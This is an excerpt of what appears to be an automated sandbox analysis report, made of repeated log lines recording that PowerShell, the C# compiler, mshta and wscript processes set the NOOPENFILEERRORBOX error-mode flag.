                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
